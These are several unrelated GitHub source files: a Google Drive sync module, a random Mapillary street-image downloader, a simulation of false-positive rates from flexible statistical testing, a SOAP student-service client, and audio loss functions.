c, dbFolders = cfg.DATABASE.fetch_gObjectSet(searchField="local_path", \
searchCriteria=currentFolder)
if len(dbFolders) == 0:
parent = create_drive_folder(service, folder, currentFolder, parent.id)
else:
parent = dbFolders[0]
parentFolder = parent
except HttpError as err:
logging.error("error creating Google Drive folder tree. %s" % str(err))
except Exception as err:
logging.error("error creating Google Drive folder tree. %s" % str(err))
return parentFolder
def upload_drive_file(service, filePath:str, parentId:str = None)-> gFile:
file = None
attempt = 1
try:
while attempt <= cfg.UPLOAD_RETRIES_MAX:
# if file is under 5 mb perform a simple upload
fileSize = os.path.getsize(filePath)
fileHash = mods.hash_file(filePath)
if fileSize <= (5 * 1024 * 1024):
f = upload_drive_file_simple(service, filePath, parentId)
else:
# we need to figure out how to resumable uploads at some point later
f = upload_drive_file_simple(service, filePath, parentId)
file = gFile(f)
if fileHash != file.properties['md5Checksum']:
logging.warning("File upload resulted in a hash mismatch.")
# remove the file
file = delete_drive_file(service, file)
attempt += 1
else:
file.localPath = filePath
file.md5 = fileHash
cfg.DATABASE.insert_gObject(file=file)
break
if attempt == cfg.UPLOAD_RETRIES_MAX:
logging.error("Exceeded max retries to upload file '%s'" % filePath)
except HttpError as err:
logging.error("error uploading file to Google Drive. %s" % str(err))
except Exception as err:
logging.error("error uploading file to Google Drive. %s" % str(err))
return file
def upload_drive_file_simple(service, filePath:str, parentId:str=None)->gFile:
file = None
try:
if parentId is None or parentId == "":
parentId = cfg.ROOT_FOLDER_ID
fileDir = os.path.dirname(filePath)
fileName = os.path.basename(filePath)
logging.info("performing simple upload of file '%s'" % filePath)
file_metadata = {'name': fileName, 'parents': parentId}
media = MediaFileUpload(filePath, resumable=True)
file = service.files().create(body=file_metadata, media_body=media,
fields='*').execute()
except HttpError as err:
logging.error("error downing a simple file upload to Google Drive. %s" % str(err))
except Exception as err:
logging.error("error downing a simple file upload to Google Drive. %s" % str(err))
return file
# uploads new files that have been identified as missing from the cloud post reconciliation
def upload_new_local_files(service):
logging.debug("starting to upload new local files to the cloud.")
try:
records, new_local_files = cfg.DATABASE.fetch_newLocalFiles()
recordsParsed = 0
while records > 0:
for f in new_local_files:
if cfg.ROOT_FOLDER_OBJECT.localPath in f.localPath:
if f.mimeType == cfg.TYPE_GOOGLE_FOLDER:
return
else:
parentFolder = os.path.dirname(f.localPath)
c, db_parentFolders = cfg.DATABASE.fetch_gObjectSet(searchField = "local_path", \
searchCriteria=parentFolder)
db_parentFolder = db_parentFolders[0]
if db_parentFolder is not None:
f.properties['parents'] = [db_parentFolder.id]
else:
parent = create_drive_folder_tree(service, parentFolder)
f.properties['parents'] = parent.id
#file = upload_drive_file(service, f.localPath, f.properties['parents'][0])
change = filewatcher.Change('created', f.localPath, None, 'file')
cfg.LOCAL_QUEUE.put(change)
else:
logging.warning("skipping file '%s'. path not in local cache directory." % f.localPath)
recordsParsed += 1
records, new_local_files = cfg.DATABASE.fetch_newLocalFiles(offset=recordsParsed)
except Exception as err:
logging.error("error uploading new files to the cloud. %s" % str(err))
def update_drive_file(service, file:gFile, localPath:str):
logging.info("updating Google drive file %s." % file.name)
updated_file = None
try:
media_body = MediaFileUpload(localPath, resumable=True)
# Send the request to the API.
updated_file = service.files().update(
fileId=file.id,
#body=file.properties,
media_body=media_body).execute()
# get the encriched full metadata
updated_file = get_drive_object(service, updated_file['id'])
updated_file.localPath = file.localPath
updated_file.md5 = file.md5
cfg.DATABASE.update_gObject(file=updated_file)
except HttpError as err:
logging.error("error updating Google drive file '%s'. %s" % (file.name, str(err)))
except Exception as err:
logging.error("error updating Google drive file '%s'. %s" % (file.name, str(err)))
return updated_file
def update_drive_files(service):
logging.debug("starting to update changed local files to the cloud.")
try:
c, changed_local_files = cfg.DATABASE.fetch_changedLocalFiles()
recordsParsed = 0
while c > 0:
for f in changed_local_files:
if cfg.ROOT_FOLDER_OBJECT.localPath in f.localPath:
if f.mimeType == cfg.TYPE_GOOGLE_FOLDER:
return
else:
#parentFolder = os.path.dirname(f.localPath)
#db_parentFolders, c = cfg.DATABASE.fetch_gObjectSet(searchField = "local_path", \
# searchCriteria=parentFolder)
#db_parentFolder = db_parentFolders[0]
#if db_parentFolder is not None:
# f.properties['parents'] = [db_parentFolder.id]
#else:
# parent = create_drive_folder_tree(service, parentFolder)
# f.properties['parents'] = parent.id
#file = update_drive_file(service, f, f.localPath)
change = filewatcher.Change('modified', f.localPath, None, 'file')
cfg.LOCAL_QUEUE.put(change)
else:
logging.warning("skipping file '%s'. path not in local cache directory." % f.localPath)
recordsParsed += 1
c, changed_local_files = cfg.DATABASE.fetch_newLocalFiles(offset=recordsParsed)
except Exception as err:
logging.error("error updating cloudfile '%s'. %s" % (f.name, str(err)))
def move_drive_file(service, file:gFile, newParent_id: str=None, newName:str = None) -> gFile:
try:
if file.properties['parents'][0] != newParent_id and newParent_id is not None:
prev_parents = ','.join(file.properties['parents'])
file = service.files().update(fileId=file.id, addParents=newParent_id,
removeParents=prev_parents,
fields='id, parents').execute()
file = get_drive_object(service, file['id'])
logging.info("moved file ID '%s' to new parent ID '%s'" % (file.id, newParent_id))
else:
if file.name != newName:
file = service.files().update(fileId=file.id, body={'name': newName}).execute()
file = get_drive_object(service, file['id'])
else:
logging.warning("Unable to process file '%s' move. Can't parse the change." % file.id)
except HttpError as err:
logging.error("error moving file '%s' in Google Drive. %s" % (file.name, str(err)))
except Exception as err:
logging.error("error moving file '%s' in Google Drive. %s" % (file.name, str(err)))
return file
def delete_drive_file(service, file:gFile):
#file = None
try:
file.properties['trashed'] = True
gSerivceFiles = service.files()
gSerivceFiles.delete(fileId = file.id).execute()
logging.info("deleted Google Drive file with id %s" % file.id)
#cfg.DATABASE.update_gObject(file=file)
cfg.DATABASE.delete_gObject(id=file.id) # do we want to delete the file? or just mark it as trashed?
except HttpError as err:
# 404, delete from db since it's gone from Drive
if err.resp.status == 404:
logging.info("File not found in Drive, removing from db.")
cfg.DATABASE.delete_gObject(id=file.id) # do we want to delete the file? or just mark it as trashed?
else:
logging.error("error deleteing file '%s' from Google Drive. %s" % (file.name, str(err)))
except Exception as err:
logging.error("error deleteing file '%s' from Google Drive. %s" % (file.name, str(err)))
return file
# region : Change tracking in Google drive
# gets the change token for changes in the drive since last sync
# https://developers.google.com/drive/api/guides/manage-changes
def get_drive_changes_token(service):
logging.info("fetching the start changes token from Google Drive.")
startToken = None
try:
response = service.changes().getStartPageToken().execute()
startToken = response.get("startPageToken")
except HttpError as err:
logging.error("error getting changes start token. %s", str(err))
print(err)
except Exception as err:
logging.error("error getting changes start token. %s", str(err))
print(str(err))
return startToken
# get changes since the last change token fetch
# https://developers.google.com/drive/api/guides/manage-changes
def get_drive_changes(service, changeToken):
changes = []
try:
while changeToken is not None:
response = service.changes().list(pageToken=changeToken,
spaces='drive').execute()
for change in response.get('changes'):
# Process change
changes.append(change)
if 'newStartPageToken' in response:
# Last page, save this token for the next polling interval
#global CHANGES_TOKEN
cfg.CHANGES_TOKEN = response.get('newStartPageToken')
changeToken = response.get('nextPageToken')
except HttpError as err:
logging.error("error getting changes from Drive. %s", str(err))
print(err)
except Exception as err:
logging.error("error getting changes from Drive. %s", str(err))
print(str(err))
return changes
# handles any sort of change in a file in google drive (create, update, delete)
def handle_changed_file(service, file:gFile = None):
try:
parents = []
if file is not None:
# ******************************************
# create or update an existing file
# ******************************************
dbFiles = cfg.DATABASE.fetch_gObject(file.id)
# **** handle file creation ****
if len(dbFiles) > 1:
logging.warn("file id %s has multiple entries in the database. skipping." % file.id)
elif len(dbFiles) == 0:
# **** handle new files from Google Drive ****
logging.debug("file id %s isn't in the database, assuming a new object." % file.id)
if 'parents' in file.properties.keys():
for parent_id in file.properties['parents']:
parent_folder = get_drive_object(service, parent_id)
full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder), \
file.name)
full_path = os.path.expanduser(full_path)
file.localPath = full_path
cfg.DATABASE.insert_gObject(file=file)
if file.properties['trashed'] == False:
cfg.LQUEUE_IGNORE.append(full_path)
download_file(service, file, full_path)
else:
# **** handle file updates ****
dbFile = dbFiles[0]
if file.properties != dbFile.properties and int(file.properties['version']) > int(dbFile.properties['version']):
# if the md5 is different for the file, then we are going to remove the local version and re-download
logging.info("file id %s is newer in the cloud and has changes, processing." % file.id)
if (file.properties['trashed'] == False):
file.localPath = dbFile.localPath
if (file.properties['md5Checksum'] != dbFile.md5 or file.name != dbFile.name):
file.md5 = dbFile.md5 # we'll download it later if we need to
try:
# delete the existing files and redownload for each instance of the file
if 'parents' in file.properties.keys():
for parent_id in file.properties['parents']:
for db_parent_id in dbFile.properties['parents']:
parent_folder = get_drive_object(service, parent_id)
root_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder))
full_path = os.path.join(root_path, file.name)
full_path = os.path.expanduser(full_path)
parent_folder = get_drive_object(service, db_parent_id)
root_path_old = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder))
full_path_old = os.path.join(root_path_old, dbFile.name)
full_path_old = os.path.expanduser(full_path_old)
# do the the redownload if the md5 doesn't match
if file.properties['md5Checksum'] != dbFile.md5:
logging.info("file id %s checksum is different and cloud version is newer, redownloading." % file.id)
if file.properties['trashed'] == False:
cfg.LQUEUE_IGNORE.append(full_path)
if os.path.exists(full_path):
logging.info("removing outdated file '%s'." % full_path)
os.remove(full_path)
download_file(service, file, full_path)
# do the rename
if file.name != dbFile.name:
if root_path_old == root_path:
if file.properties['trashed'] == False:
cfg.LQUEUE_IGNORE.append(full_path_old)
cfg.LQUEUE_IGNORE.append(full_path)
os.rename(full_path_old, full_path)
cfg.DATABASE.update_gObject(file=file)
#sleep(0.2) # give the Watchdog service time to catch up
#cfg.LQUEUE_IGNORE.remove(full_path_old)
#cfg.LQUEUE_IGNORE.remove(full_path)
except Exception as err:
logging.error("unable to update file id %s. %s" % (file.id, str(err)))
else:
file.md5 = dbFile.md5
cfg.DATABASE.update_gObject(file=file)
# ***** delete a local file ******
elif file.properties['trashed'] == True:
file.md5 = dbFile.md5
file.localPath = dbFile.localPath
cfg.DATABASE.update_gObject(file=file)
if 'parents' in file.properties.keys():
for parent_id in file.properties['parents']:
try:
parent_folder = get_drive_object(service, parent_id)
full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder), \
file.name)
full_path = os.path.expanduser(full_path)
if os.path.exists(full_path):
logging.info("removing trashed file '%s'" % full_path)
cfg.LQUEUE_IGNORE.append(full_path)
os.remove(full_path)
#sleep(0.2) # give the Watchdog service time to catch up
#cfg.LQUEUE_IGNORE.remove(full_path)
except Exception as err:
logging.error("unable to remove local file %s. %s" % (full_path, str(err)))
except Exception as err:
logging.error("error processing Google object change. %s" % str(err))
except HttpError as err:
logging.error("error processing Google object change. %s" % str(err))
return
# handles any sort of folder change in google drive (create, update, delete)
def handle_changed_folder(service, folder: gFolder = None):
try:
parents = []
if folder is not None:
# *************************************************************************
# create or update an existing folder
# *************************************************************************
dbFolders = cfg.DATABASE.fetch_gObject(folder.id)
if len(dbFolders) > 1:
logging.warn("folder id %s has multiple entries in the database. skipping." % folder.id)
elif len(dbFolders) == 0:
logging.debug("folder %s isn't in the database, assuming a new object." % folder.id)
folder.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folder))
cfg.DATABASE.insert_gObject(folder=folder)
if 'parents' in folder.properties.keys():
for parent_id in folder.properties['parents']:
parent_folder = get_drive_object(service, parent_id)
full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder), \
folder.name)
full_path = os.path.expanduser(full_path)
if not os.path.exists(full_path):
cfg.LQUEUE_IGNORE.append(full_path)
logging.info("creating new local folder '%s'" % full_path)
os.mkdir(os.path.expanduser(full_path))
else:
# if folder name is different, rename it. if it's trashed, remove it. only changes possible for folders
dbFolder = dbFolders[0]
if folder.properties != dbFolder.properties and int(folder.properties['version']) > int(dbFolder.properties['version']):
logging.info("folder id %s has a later version and different properties in Google Drive, applying changes" % folder.id)
# update the folder properties in the db
folder.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folder))
cfg.DATABASE.update_gObject(folder=folder)
# **** rename the local folder(s) ****
if folder.name != dbFolder.name and folder.properties['trashed'] == False:
for parent_id in folder.properties['parents']:
for db_parent_id in dbFolder.properties['parents']:
parent_folder = get_drive_object(service, parent_id)
root_path_new = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder))
full_path_new = os.path.join(root_path_new, folder.name)
full_path_new = os.path.expanduser(full_path_new)
parent_folder = get_drive_object(service, db_parent_id)
root_path_old = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder))
full_path_old = os.path.join(root_path_old, dbFolder.name)
full_path_old = os.path.expanduser(full_path_old)
if root_path_old == root_path_new:
cfg.LQUEUE_IGNORE.append(full_path_new)
cfg.LQUEUE_IGNORE.append(full_path_old)
os.rename(full_path_old, full_path_new)
# ***** delete a local folder ******
if folder.properties['trashed'] == True:
if 'parents' in folder.properties.keys():
for parent_id in folder.properties['parents']:
parent_folder = get_drive_object(service, parent_id)
full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
get_full_folder_path(service, parent_folder), \
folder.name)
full_path = os.path.expanduser(full_path)
if os.path.exists(full_path):
cfg.LQUEUE_IGNORE.append(full_path)
logging.info("removing trashed directory '%s'" % full_path)
shutil.rmtree(full_path)
except Exception as err:
logging.error("error processing Google object change. %s" % str(err))
except HttpError as err:
logging.error("error processing Google object change. %s" % str(err))
return
# scans all files in Google drive that aren't in the db. that's our change set.
# this only needs to happen during startup. otherwise, change notifications will do the job
def get_gdrive_changes(service) -> List:
# loop through the pages of files from google drive
# return the md5Checksum property, along with name, id, mimeType, version, parents
# compare files by id with the db. look where the md5Checksum != md5 stored in the db
# also look for files not in the db
# important: if the file in google drive is a later version, it's authoritative
# this will be the changes from the side of google drive
logging.info("scanning google drive files, looking for files and folders that have changed.")
differences = []
try:
gServiceFiles = service.files()
params = { "q": "'me' in owners",
"pageSize": cfg.PAGE_SIZE,
"fields": "nextPageToken," + "files(id, name, mimeType, version, md5Checksum, parents, ownedByMe)"
}
request = gServiceFiles.list(**params)
while (request is not None):
files_page = request.execute()
fs = files_page.get('files', [])
for f in fs:
dbFile = None
rows = cfg.DATABASE.fetch_gObject(f['id'])
if len(rows) > 0:
dbFile = rows[0]
if f['mimeType'] == cfg.TYPE_GOOGLE_FOLDER:
googleFolder = gFolder(f)
if dbFile is not None and 'version' in dbFile.properties.keys():
# if (dbFile.id != googleFolder.id or \
# dbFile.name != googleFolder.name) and \
# dbFile.properties['version'] < googleFolder.properties['version']:
if (int(dbFile.properties['version']) < int(googleFolder.properties['version'])):
# fetch full metadata of the file
get_params = {"fileId": googleFolder.id, "fields": "*"}
get_req = gServiceFiles.get(**get_params)
full_folder = gFolder(get_req.execute())
full_folder.localPath = get_full_folder_path(service, full_folder)
#differences.append(full_folder)
cfg.REMOTE_QUEUE.put(full_folder)
else:
get_params = {"fileId": googleFolder.id, "fields": "*"}
get_req = gServiceFiles.get(**get_params)
full_folder = gFolder(get_req.execute())
#differences.append(full_folder)
cfg.REMOTE_QUEUE.put(full_folder)
else:
googleFile = gFile(f)
if dbFile is not None and 'version' in dbFile.properties.keys():
#if (dbFile.md5 != googleFile.properties['md5Checksum'] or \
# dbFile.mimeType != googleFile.mimeType) and \
# dbFile.properties['version'] < googleFile.properties['version']:
if (int(dbFile.properties['version']) < int(googleFile.properties['version'])):
# fetch full metadata of the file
get_params = {"fileId": googleFile.id, "fields": "*"}
get_req = gServiceFiles.get(**get_params)
full_file = gFile(get_req.execute())
#differences.append(full_file)
cfg.REMOTE_QUEUE.put(full_file)
else:
if cfg.TYPE_GOOGLE_APPS not in googleFile.mimeType:
get_params = {"fileId": googleFile.id, "fields": "*"}
get_req = gServiceFiles.get(**get_params)
full_file = gFile(get_req.execute())
#differences.append(full_file)
cfg.REMOTE_QUEUE.put(full_file)
request = gServiceFiles.list_next(request, files_page)
except HttpError as err:
#exc_type, exc_obj, exc_tb = sys.exc_info()
#fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
#logging.error(exc_type, fname, exc_tb.tb_lineno)
logging.error("error scanning google drive files. %s" % str(err))
print(err)
except Exception as err:
#exc_type, exc_obj, exc_tb = sys.exc_info()
#fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
#logging.error(exc_type, fname, exc_tb.tb_lineno)
logging.error("error scanning google drive files. %s" % str(err))
print(err)
return differences
# endregion | k3tchup/google_drive_sync | libgdrive/gDrive.py | gDrive.py | py | 48,013 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"... |
28080781134 | """Adapted from:
https://github.com/hugovk/random-street-view/blob/main/random_street_view.py
"""
import argparse
import json
import os
import random
import sys
import requests
from urllib.request import urlopen, urlretrieve
from datetime import datetime
import contextlib
import yaml
import traceback
import shapefile # pip install pyshp
import mapillary.interface as mly # pip install mapillary
# Optional, http://stackoverflow.com/a/1557906/724176
try:
import timing
assert timing # avoid flake8 warning
except ImportError:
pass
IMG_SUFFIX = "jpg"
MAX_TRIES = 10 # Used to set number of maximum attempts at finding a non-filtered image
with open("api_key.yaml", "r") as ymlfile:
key = yaml.load(ymlfile, Loader=yaml.FullLoader)
token = key['mly_token']
mly.set_access_token(token)
parser = argparse.ArgumentParser(
description="Get random Street View images from within the borders of a given country. http://bboxfinder.com may "
"be helpful for creating box coordinates and https://www.mapillary.com/app may be helpful for checking those boxes "
"contain any images. By default, images are filtered out if they have any traffic signs as detected by Mapillary's "
"systems; this should not be trusted absolutely, images should be manually checked for signs.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("country", help="ISO 3166-1 Alpha-3 Country Code, 'none', or 'near_global'")
help_str = "For default from country borders, enter 0. Ignored if 'near_global'."
parser.add_argument("min_lon", type=float, help=help_str)
parser.add_argument("min_lat", type=float, help=help_str)
parser.add_argument("max_lon", type=float, help=help_str)
parser.add_argument("max_lat", type=float, help=help_str)
parser.add_argument("-n", "--images-wanted", type=int, default=100, help="Total number of images wanted.")
parser.add_argument("-b", "--burst", type=int, default=10, help="The maximum number of nearby images downloaded from "
"any random geographical point that hits. >1 (e.g. 10) is recommended if using 'near_global'. Note "
"that nearby images may be captured by the same camera on the same day, so there is a trade-off "
"between speed of image retrieval and diversity of images to chosen here. I have so far been "
"unable to determine the definition of 'nearby' from the Mapillary SDK documentation, but each "
"point hit will often return 100s-1000s of nearby images as shown by '--save-to-json'.")
parser.add_argument("-j", "--save-to-json", action="store_true", help="Save to a JSON file metadata of images found "
"near a point.")
parser.add_argument("-N", "--no-filter", action="store_true", help="Turn off filtering of images with traffic signs.")
args = parser.parse_args()
# TODO: "--all-in-box", '-A' mode where every single image in the box is downloaded, not just random ones; ADD A WARNING
if args.images_wanted < 1:
raise ValueError("Number of images wanted must be at least 1.")
# TODO: Allow for -n 0 for only downloading metadata for images near point (require that -j must also be specified)
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs.
# http://www.ariel.com.au/a/python-point-int-poly.html
def point_inside_polygon(x, y, poly):
n = len(poly)
inside = False
p1x, p1y = poly[0]
for i in range(n + 1):
p2x, p2y = poly[i % n]
if y > min(p1y, p2y):
if y <= max(p1y, p2y):
if x <= max(p1x, p2x):
if p1y != p2y:
xinters = (y - p1y) * (p2x - p1x) / (p2y - p1y) + p1x
if p1x == p2x or x <= xinters:
inside = not inside
p1x, p1y = p2x, p2y
return inside
print("Loading borders...")
shape_file = "TM_WORLD_BORDERS-0.3.shp"
if not os.path.exists(shape_file):
sys.exit(
f"Cannot find {shape_file}. Please download it from "
"http://thematicmapping.org/downloads/world_borders.php and try again."
)
sf = shapefile.Reader(shape_file, encoding="latin1")
shapes = sf.shapes()
if args.country.lower() == "none":
if args.min_lon == 0 or args.min_lat == 0 or args.max_lon == 0 or args.max_lat == 0:
sys.exit("A valid bounding box must be entered if no country is specified.")
min_lon = args.min_lon
min_lat = args.min_lat
max_lon = args.max_lon
max_lat = args.max_lat
borders = []
elif args.country.lower() == "near_global":
min_lon = -160
min_lat = -56
max_lon = 180
max_lat = 71
borders = []
else:
print("Finding country...")
for i, record in enumerate(sf.records()):
if record[2] == args.country.upper():
print(record[2], record[4])
print(shapes[i].bbox)
min_lon = shapes[i].bbox[0] if args.min_lon == 0 else args.min_lon
min_lat = shapes[i].bbox[1] if args.min_lat == 0 else args.min_lat
max_lon = shapes[i].bbox[2] if args.max_lon == 0 else args.max_lon
max_lat = shapes[i].bbox[3] if args.max_lat == 0 else args.max_lat
borders = shapes[i].points
break
print("Getting images...")
attempts, country_hits, point_hits, point_misses, imagery_hits, imagery_misses, imagery_filtered = 0, 0, 0, 0, 0, 0, 0
dtime = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
outdir = f"mly_random_{args.country.upper()}_{dtime}"
img_ids = []
try:
while True:
attempts += 1
rand_lat = random.uniform(min_lat, max_lat)
rand_lon = random.uniform(min_lon, max_lon)
# Check if (lon, lat) is inside country borders
point_inside = True
if borders != []:
point_inside = point_inside_polygon(rand_lon, rand_lat, borders)
if point_inside:
# print("In country")
country_hits += 1
try:
# We will only retrieve flat images, although the MTSD contains 1138 flattened 360° panorama images
# NOTE: I couldn't figure out how to suppress the GET prints from the Mapillary SDK
print()
images = mly.get_image_close_to(longitude=rand_lon, latitude=rand_lat, image_type='flat',
fields=['thumb_original_url']).to_dict()
point_hits += 1
except IndexError:
point_misses += 1
print(f" No images found close to point")
continue
hit_dir = f"hits_{args.country.upper()}_{dtime}"
if args.save_to_json:
os.makedirs(hit_dir, exist_ok=True)
with open(os.path.join(hit_dir, f"hit_#{point_hits}_with_{len(images['features'])}_imgs_"
f"{rand_lon}_{rand_lat}.json"), mode="w") as f:
json.dump(images, f, indent=4)
print('\n\n lat,lon: ' + str(rand_lat) + ',' + str(rand_lon))
ii = 0
found = 0
while found < args.burst and ii < (found + 1) * MAX_TRIES:
if ii >= len(images['features']):
break
img_id = images['features'][ii]['properties']['id']
if img_id in img_ids:
imagery_misses += 1
ii += 1
continue
url_request = f"https://graph.mapillary.com/{img_id}?access_token={token}&fields=thumb_original_url"
response = requests.get(url_request).json() # Query the API for the original image URL
try:
url = response['thumb_original_url']
except KeyError:
print(f" Error retrieving image URL for {img_id}")
imagery_misses += 1
ii += 1
continue
# Filter out images with traffic signs detected by Mapillary
passed_filter = True
if not args.no_filter:
# NOTE: I couldn't figure out how to suppress the GET prints from the Mapillary SDK
detections = mly.get_detections_with_image_id(img_id).to_dict()
def is_sign(detection):
v = detection['properties']['value']
return (
"complementary" in v or
"information" in v or
"regulatory" in v or
"warning" in v
)
signs = [d['properties']['value'] for d in detections['features'] if not is_sign(d)]
if signs != []:
imagery_filtered += 1
passed_filter = False
print(" ----- Skipped image with traffic sign detections -----")
if passed_filter:
os.makedirs(outdir, exist_ok=True)
outfile = os.path.join(outdir, f"{img_id}.{IMG_SUFFIX}")
try:
# Download the image
data = requests.get(url)
with open(outfile, "wb") as f:
f.write(data.content)
except KeyboardInterrupt:
sys.exit("exit")
if os.path.isfile(outfile):
print(f" ========== Got one! Taken from this point: {found + 1} "
f"(from {ii + 1} attempts) ==========")
img_ids.append(img_id)
imagery_hits += 1
found += 1
if imagery_hits >= args.images_wanted:
break
else:
imagery_misses += 1
ii += 1
if imagery_hits >= args.images_wanted:
break
else:
# print(" Point outside country")
pass
except KeyboardInterrupt:
print("Keyboard interrupt")
except Exception:
# Make sure that stats are still printed and saved
traceback.print_exc()
stats_str = f"Attempts:\t{attempts}\n"
if borders != []:
stats_str += f"Country hits:\t{country_hits}\n"
stats_str += f"Point misses:\t{point_misses}\n"
stats_str += f"Point hits:\t{point_hits}\n"
stats_str += f"Imagery misses:\t{imagery_misses}\n"
if not args.no_filter:
stats_str += f"Filtered out:\t{imagery_filtered}\n"
stats_str += f"Imagery hits:\t{imagery_hits}"
print(f"\n{stats_str}")
with open(os.path.join(outdir, "stats.txt"), mode="w") as f:
f.write(stats_str)
| BunningsWarehouseOfficial/random-mapillary | random_mapillary.py | random_mapillary.py | py | 10,780 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.load",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "mapillary.interface.set_access_token",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "m... |
36878259269 | import numpy as np
from scipy.stats import ttest_ind
np.random.seed(0)
# set up simulation parameters
num_simulations = 15000 # number of simulations to run
sample_size = 20 # sample size for each group
mean_1 = 0 # true mean for group 1
std_dev = 1 # standard deviation for both groups
corr = 0.5 # correlation between dependent variables
# generate dependent variables with specified correlation
cov_matrix = np.array([[1, corr], [corr, 1]])
# dependent_vars = np.random.multivariate_normal([0, 0], cov_matrix, size=sample_size)
# initialize lists to store results
p_values = []
# run simulations
for i in range(num_simulations):
# generate random data for both groups
group_1 = np.random.multivariate_normal([mean_1, mean_1], cov_matrix, size=sample_size)
null_hypothesis = np.random.normal(loc=mean_1, scale=std_dev, size=sample_size)
# this null hypothesis has the same mean and standard deviation as the dependent variables we
# obtained from multivariate normal distribution
dep_var1 = group_1[:, 0]
dep_var2 = group_1[:, 1]
dep_mean = (dep_var1 + dep_var2) / 2
# calculate t-test p-value for each situation
p_value_1 = ttest_ind(dep_var1, null_hypothesis)[1]
if p_value_1 < 0.05:
p_values.append(p_value_1)
else:
p_value_2 = ttest_ind(dep_var2, null_hypothesis)[1]
if p_value_2 < 0.05:
p_values.append(p_value_2)
else:
p_value_3 = ttest_ind(dep_mean, null_hypothesis)[1]
if p_value_3 < 0.05:
p_values.append(p_value_3)
# print the results
print(len(p_values))
print("Percentage of significant results", round(len(p_values) / num_simulations, 3))
| guangyaodou/False-Positive-Psychology-Simulation | situation_A.py | situation_A.py | py | 1,698 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.seed",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random.multivaria... |
18033055398 | from zeep.client import Client
import zeep
settings = zeep.Settings(strict=False, xml_huge_tree=True)
wsdl = 'http://localhost:7000/ws/EstudianteWebServices?wsdl'
cliente = Client(wsdl)
ListEstudiantes = cliente.service.getListaEstudiante()
def consultar(matricula):
Estudiante = cliente.service.getEstudiante(matricula)
return Estudiante
def CrearEstudiante(matricula, nombre, carrera):
factory = cliente.type_factory('http://soap.eict.pucmm.edu/')
nuevoEstudiante = factory.estudiante(carrera=carrera, matricula=carrera, nombre=nombre)
creado = cliente.service.crearEstudiante(nuevoEstudiante)
return creado
def EliminarEstudiante(matricula):
return cliente.service.eliminarEstudiante(matricula)
print("[INFO] LISTA DE ESTUDIANTES: ")
for est in ListEstudiantes:
print('[Nombre]: ' + est.nombre + ' [Matricula]: ' + str(est.matricula))
print('[INFO] Ingrese matricula del Estudiante que desea consultar: {DEFAULT= 20011136} \n')
id = input()
print('[INFO] ESTUDIANTE CONSULTADO: \n' + str(consultar(matricula=id)))
print('[INFO] Ingrese Información del Nuevo Estudiante que desea CREAR: ')
print('[CARRERA]: ')
carrera = input()
print('[matricula]: ')
matricula = input()
print('[nombre]: ')
nombre = input()
print('[INFO] ESTUDIANTE CREADO: ' + str(CrearEstudiante(matricula=matricula,nombre=nombre,carrera=carrera)))
print('[INFO] Matricular del Estudiante que desea ELIMINAR: ')
id = input()
if(EliminarEstudiante(matricula=id)):
print('[INFO] ESTUDIANTE Eliminado!')
print('~(^_^)~ --[HAPPY CODING!!]-- ~(^_^)~ ')
| AndoRoman/Client-SOAP | Main.py | Main.py | py | 1,574 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "zeep.Settings",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "zeep.client.Client",
"line_number": 6,
"usage_type": "call"
}
] |
17824878888 | import torch.nn.functional as F
import torch
import numpy as np
def mae(input, target):
return torch.mean(torch.abs(input - target))
def logmae_wav(model, output_dict, target):
loss = torch.log10(torch.clamp(mae(output_dict['wav'], target), 1e-8, np.inf))
return loss
def max_si_snr(input, target, eps = 1e-8):
assert input.size() == target.size()
B, C, T = target.size()
# print(B, C, T)
# zero-mean norm
mean_target = torch.sum(target, dim = 2, keepdim=True) / T
# print(mean_target.size())
mean_input = torch.sum(input, dim = 2, keepdim=True) / T
# print(mean_input.size())
zero_mean_target = target - mean_target
zero_mean_input = input - mean_input
# print(zero_mean_target.size())
# print(zero_mean_input.size())
# Si-SNR
s_target = torch.unsqueeze(zero_mean_target, dim = 1)
# print(s_target.size())
s_input = torch.unsqueeze(zero_mean_input, dim = 2)
# print(s_input.size())
pair_wise_dot = torch.sum(s_input * s_target, dim = 3, keepdim=True)
# print(pair_wise_dot.size())
s_target_energy = torch.sum(s_target ** 2, dim = 3, keepdim=True)
# print(s_target_energy.size())
pair_wise_proj = pair_wise_dot * s_target / s_target_energy
# print(pair_wise_proj.size())
e_noise = s_input - pair_wise_proj
# print(e_noise.size())
pair_wise_si_snr = torch.sum(pair_wise_proj ** 2, dim = 3) / (torch.sum(e_noise ** 2, dim = 3) + eps)
pair_wise_si_snr = 10 * torch.log10(pair_wise_si_snr + eps)
# print(pair_wise_si_snr.size())
